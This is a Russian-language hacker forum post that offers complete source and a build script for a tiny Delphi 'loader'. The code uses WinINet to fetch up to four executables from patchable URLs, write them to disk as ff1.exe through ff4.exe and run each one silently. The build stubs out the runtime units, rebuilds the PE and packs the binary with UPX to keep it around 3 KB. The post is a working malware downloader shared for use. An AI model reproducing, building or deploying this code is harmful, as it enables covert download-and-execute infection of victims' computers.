blаcksun
Сообщений: 1670
Оценки: 0
Присоединился: 2007-11-19 20:03:45.703333
|
Кто то тут просил лоадер …. Вес билда: 3кб build.bat quote:
@echo off del loader.exe dcc32 -Q System.pas SysInit.pas -M -Y -Z -$D- dcc32 -Q loader.dpr -$O+ pause start /wait dd.exe loader.exe start /wait upx.exe loader.exe cls dd.exe - PE Rebuilder ———– SysInit.pas quote:
unit SysInit;
interface
procedure _InitExe;
procedure _halt0;
procedure _InitLib(Context: PInitContext);
var
ModuleIsLib: Boolean;
TlsIndex: Integer = -1;
TlsLast: Byte;
const
PtrToNil: Pointer = nil;
implementation
procedure _InitLib(Context: PInitContext);
asm
end;
procedure _InitExe;
asm
end;
procedure _halt0;
asm
end;
end.
———- system.pas quote:
unit System;
interface
procedure _HandleFinally;
type
TGUID = record
D1: LongWord;
D2: Word;
D3: Word;
D4: array [0..7] of Byte;
end;
PInitContext = ^TInitContext;
TInitContext = record
OuterContext: PInitContext;
ExcFrame: Pointer;
InitTable: pointer;
InitCount: Integer;
Module: pointer;
DLLSaveEBP: Pointer;
DLLSaveEBX: Pointer;
DLLSaveESI: Pointer;
DLLSaveEDI: Pointer;
ExitProcessTLS: procedure;
DLLInitState: Byte;
end;
implementation
procedure _HandleFinally;
asm
end;
end.
———- loader.dpr quote:
{
###### bsLoader ######
by BlackSun
http://stars-team.org.ru
http://xaknet.ru
Компилить только батнком! (build.bat)
}
program loader;
const
Kernel32 = 'Kernel32.dll';
Winetdll = 'wininet.dll';
function InternetOpen(lpszAgent: PChar; dwAccessType: LongWord;
lpszProxy, lpszProxyBypass: PChar; dwFlags: LongWord): Pointer; stdcall;
external Winetdll name 'InternetOpenA';
function InternetOpenUrl(hInet: Pointer; lpszUrl: PChar;
lpszHeaders: PChar; dwHeadersLength: LongWord; dwFlags: LongWord;
dwContext: LongWord): Pointer; stdcall; external Winetdll name 'InternetOpenUrlA';
function InternetReadFile(hFile: Pointer; lpBuffer: Pointer;
dwNumberOfBytesToRead: LongWord; var lpdwNumberOfBytesRead: LongWord): Boolean; stdcall;
external Winetdll name 'InternetReadFile';
function InternetCloseHandle(hInet: Pointer): Boolean; stdcall;
external Winetdll name 'InternetCloseHandle';
function ShellExecute(hWnd: Integer; Operation, FileName, Parameters,
Directory: PChar; ShowCmd: Integer): Integer; stdcall; external 'Shell32.dll'
name 'ShellExecuteA';
function CreateFileA(lpFileName: PChar; dwDesiredAccess, dwShareMode: LongWord;
lpSecurityAttributes: PChar; dwCreationDisposition,
dwFlagsAndAttributes: LongWord; hTemplateFile: Integer): Integer; stdcall;
external Kernel32 name 'CreateFileA';
function WriteFile(hFile: Integer; const Buffer;
nNumberOfBytesToWrite: LongWord; var lpNumberOfBytesWritten: LongWord;
lpOverlapped: PChar): Boolean; stdcall;
external Kernel32 name 'WriteFile';
function CloseHandle(hObject: Integer): Boolean; stdcall;
external Kernel32 name 'CloseHandle';
procedure ExitProcess(uExitCode: Integer); stdcall;
external Kernel32 name 'ExitProcess';
// function lstrcatA(lpString1, lpString2: PChar): Pchar; stdcall;
// external Kernel32 name 'lstrcatA';
procedure Sleep(milliseconds: Cardinal); stdcall;
external Kernel32 name 'Sleep'; stdcall;
// ##### Debug ######
{ function MessageBoxA(hWnd: Integer; lpText, lpCaption: PChar; uType: Integer): Integer;
stdcall; external 'user32.dll' name 'MessageBoxA'; }
const
File1 = 'http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa';
File2 = 'http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa';
File3 = 'http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa';
File4 = 'http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa';
procedure DownloadAllFiles;
var
hSession, hURL: Pointer;
procedure DownloadFile(URL, Name: PChar);
const
BufferSize = 1024;
var
hFile: Integer;
Buffer: array[1..BufferSize] of Byte;
BufferLen: LongWord;
begin
hURL := InternetOpenURL(hSession, URL, nil, 0, 0, 0);
hFile := CreateFileA(Name, $40000000, 0, nil, 2, $00000080, 0);
repeat
InternetReadFile(hURL, @Buffer, SizeOf(Buffer), BufferLen);
WriteFile(hFile, Buffer, BufferLen, BufferLen, nil);
until
BufferLen = 0;
CloseHandle(hFile);
InternetCloseHandle(hURL);
ShellExecute(0, nil, Name, nil, nil, 1);
Sleep(24000);
end;
begin
hSession := InternetOpen('a', 0, nil, nil, 0);
if File1 <> '' then
DownloadFile(File1, 'ff1.exe');
if File2 <> '' then
DownloadFile(File2, 'ff2.exe');
if File3 <> '' then
DownloadFile(File3, 'ff3.exe');
if File4 <> '' then
DownloadFile(File4, 'ff4.exe');
InternetCloseHandle(hSession);
end;
begin
asm
jmp @Start
db 'b'
db 's'
db 'L'
db 'o'
db 'a'
db 'd'
db 'e'
db 'r'
@Start:
end;
DownloadAllFiles;
ExitProcess(0);
end.
—————- [C] BlackSun [S.T.A.R.S. Team][XakNet Team] http://stars-team.org.ru http://forum.xaknet.ru
|